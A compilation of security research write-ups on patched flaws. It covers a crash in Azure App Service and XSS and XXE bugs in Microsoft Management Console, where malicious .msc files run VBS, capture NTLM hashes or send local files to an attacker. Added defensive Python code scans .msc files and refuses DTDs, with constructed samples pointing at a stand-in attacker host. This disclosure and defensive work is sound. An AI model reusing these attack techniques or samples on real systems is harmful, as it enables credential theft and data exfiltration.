
We created a C# Azure function which loads a native DLL and calls the load function.

The load function brute forces the handles until it finds an open one whose name starts with “iisipm”. Then it constructs the malicious message and sends it immediately. As a result, DWASSVC crashes.

Although we only demonstrated a crash, this vulnerability could be exploited for privilege escalation.

Impact

Microsoft has various App Service plans: [figure: App Service plans]

For more information, see: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans

Exploiting this vulnerability on any of the plans could allow us to compromise Microsoft’s App Service infrastructure. However, exploiting it specifically on a Free/Shared plan could also allow us to compromise other tenants' apps, data and accounts, thus breaking the security model of App Service.

Conclusion

The cloud is not a magical place. Although it is considered safe, it is ultimately an infrastructure that consists of code that can have vulnerabilities – just as we demonstrated in this article.

This vulnerability was disclosed and fixed by Microsoft, and was assigned CVE-2019-1372. Microsoft acknowledged that this vulnerability worked on both Azure Cloud and Azure Stack.

Source: https://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-ii/

Microsoft Management Console (MMC) Vulnerabilities

Research by: Eran Vaknin and Alon Boxiner

The goal of Microsoft Management Console (MMC) is to provide a programming platform for creating and hosting applications that manage a Microsoft Windows-based environment, and to provide a simple, consistent and integrated management user interface and administration model.

Recently, Check Point Research discovered several vulnerabilities in the console that would allow an attacker to deliver a malicious payload.

Microsoft has granted CVE-2019-0948 to this vulnerability and patched it in their June 11th Patch Tuesday release.

Vulnerability Description:

1) Multiple XSS vulnerabilities due to misconfigured WebView.

MMC has an integrated Snap-In component which in turn contains several mechanisms such as ActiveX Control, Link to Web Address, etc.


  a) An attacker chooses the Link to Web Address snap-in and inserts a URL to his server, which hosts an HTML page with a malicious payload. As the victim opens the malicious .msc file, a web-view is opened (within the MMC window) and the malicious payload is executed. We have successfully managed to insert a malicious URL that contains malicious payloads such as a redirection to an SMB server that will capture the user's NTLM hash. Moreover, it is also possible to execute a VBS script on the victim's host via the mentioned web-view.
  b) An attacker chooses the ActiveX Control snap-in (all ActiveX controls are vulnerable) and saves it to a file (.msc file). In the .msc file, under the StringTables section, the attacker changes the third string value to a malicious URL under his control, hosting an HTML page with a malicious payload. As mentioned in section a) above, we have successfully managed to insert a malicious URL that contains malicious payloads such as a redirection to an SMB server that will capture the user's NTLM hash. Moreover, it is also possible to execute a VBS script on the victim's host via the mentioned web-view. As the victim opens the malicious .msc file, a web-view is opened (within the MMC window) and the malicious payload is executed.
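Both variants above end up with the attacker's URL stored in the console file, which is XML. As an added defensive check (not part of the Check Point research or of MMC), the following Python scanner parses an .msc file and flags StringTables entries that point at a remote host; the sample .msc is constructed and trimmed to the relevant elements, and the function name, the allowed_hosts parameter and the attacker.invalid host are my own placeholders.

```python
import re
from urllib.parse import urlsplit
import xml.etree.ElementTree as ET

# Constructed minimal console file for illustration; real .msc files carry
# many more elements, but the StringTables layout is the part that matters here.
MSC_SAMPLE = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="User">
  <StringTables>
    <StringTable>
      <Strings>
        <String ID="1" Refs="1">Console Root</String>
        <String ID="2" Refs="1">Adobe Acrobat DC Browser</String>
        <String ID="3" Refs="1">http://attacker.invalid/payload.html</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

# Values that make a snap-in reach out to a remote host: http(s) URLs or UNC paths.
REMOTE_REF = re.compile(r"^(?:https?://|\\\\)", re.IGNORECASE)


def _host_of(value):
    """Hostname of an http(s) URL or UNC path, lower-cased ('' if none)."""
    if value.startswith("\\\\"):
        return value[2:].split("\\", 1)[0].lower()
    return (urlsplit(value).hostname or "").lower()


def suspicious_msc_strings(msc_text, allowed_hosts=()):
    """Return [(string_id, value)] for StringTable entries that point at a
    remote resource whose host is not in allowed_hosts.

    Both the Link to Web Address snap-in and a tampered ActiveX snap-in keep
    the URL in the StringTables, so one pass over <String> elements catches
    either variant of the malicious .msc described above.
    """
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for node in ET.fromstring(msc_text).iter("String"):
        value = (node.text or "").strip()
        if REMOTE_REF.match(value) and _host_of(value) not in allowed:
            hits.append((node.get("ID"), value))
    return hits


if __name__ == "__main__":
    for string_id, value in suspicious_msc_strings(MSC_SAMPLE):
        print(f"String ID={string_id} references a remote resource: {value}")
```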

2) XXE Vulnerability due to misconfigured XML parser.

A victim opens the MMC, chooses the Event Viewer snap-in, clicks on Action and then on Import Custom View. As soon as a malicious XML file (containing an XXE payload) is chosen, any file from the victim's host is sent to the attacker. This is possible due to a misconfigured XML parser used by the MMC custom view functionality.

Proof of Concept

1) Link to Web Address snap-in Cross-Site Scripting (XSS):

The attacker adds a new snap-in: [screenshot]

The attacker chooses a Link to Web Address snap-in: [screenshot]

The attacker then types the path to his server containing the malicious payload: [screenshot]

The attacker saves the .msc file and sends it to the victim: [screenshot]

The malicious .msc file contains the path to the attacker’s server: [screenshot]

As the victim opens the malicious .msc file, VBS code is executed: [screenshot]

2) ActiveX Control snap-in (Adobe Acrobat DC Browser example):

The attacker adds a new snap-in: [screenshot]

The attacker chooses an ActiveX Control snap-in: [screenshot]

The ActiveX control is then chosen (Adobe Acrobat DC Browser as an example): [screenshot]

The attacker saves the .msc file and sends it to the victim: [screenshot]

The malicious .msc file contains the path to the attacker’s server: [screenshot]

As the victim opens the malicious .msc file, VBS code is executed: [screenshot]

3) XXE Vulnerability Due to Misconfigured XML Parser:

Add a snap-in: [screenshot]

The attacker chooses the Event Viewer snap-in: [screenshot]

The victim selects ‘Action’ and then clicks on the ‘Import Custom View’ option: [screenshot]

The victim selects the malicious XML sent by the attacker: [screenshot]

The malicious XML containing the XXE payload reads the content of c:\windows\win.ini and sends it to the remote server via an HTTP GET request: [screenshot]

This in turn loads xml.dtd: [screenshot]

The desired file content is sent from the client console application to a remote server: [screenshot]

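The root cause is an XML parser that resolves DTDs and external entities for a document type that needs neither. As an added example (my own code, not Check Point's or Microsoft's), the following shows the parser configuration the import path should have: Python's expat with parameter-entity parsing disabled and handlers that refuse any DOCTYPE, entity declaration or external entity before it is resolved. The two custom-view XML samples are constructed, and attacker.invalid is a placeholder host.

```python
import xml.parsers.expat as expat

class UnsafeXml(Exception):
    """Raised when an imported custom view declares a DTD or an entity."""

def parse_custom_view(xml_text):
    """Parse an Event Viewer custom-view XML, refusing any DTD or entity.

    A custom view needs no DOCTYPE, so DTDs, entity declarations and external
    entity references are rejected before anything is resolved. Returns the
    (element name, attributes) pairs seen, in document order.
    """
    parser = expat.ParserCreate()
    # Never load the external DTD subset or other parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} refused (SYSTEM={sysid!r})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXml(f"entity declaration {name!r} refused")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXml(f"external entity {sysid!r} refused")

    seen = []
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: seen.append((name, attrs))
    parser.Parse(xml_text, True)  # expat.ExpatError on malformed XML
    return seen

def is_safe_custom_view(xml_text):
    """True if the document parses without touching any DTD or entity."""
    try:
        parse_custom_view(xml_text)
        return True
    except UnsafeXml:
        return False

# Constructed samples: a benign view, and one whose DOCTYPE pulls in an
# external xml.dtd the way the malicious import described above does.
SAFE_VIEW = ('<?xml version="1.0"?><ViewerConfig><QueryConfig><QueryList>'
             '<Query Id="0" Path="System"><Select Path="System">*</Select>'
             '</Query></QueryList></QueryConfig></ViewerConfig>')
XXE_VIEW = ('<?xml version="1.0"?>'
            '<!DOCTYPE ViewerConfig SYSTEM "http://attacker.invalid/xml.dtd">'
            '<ViewerConfig><QueryConfig/></ViewerConfig>')
```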
Source: https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/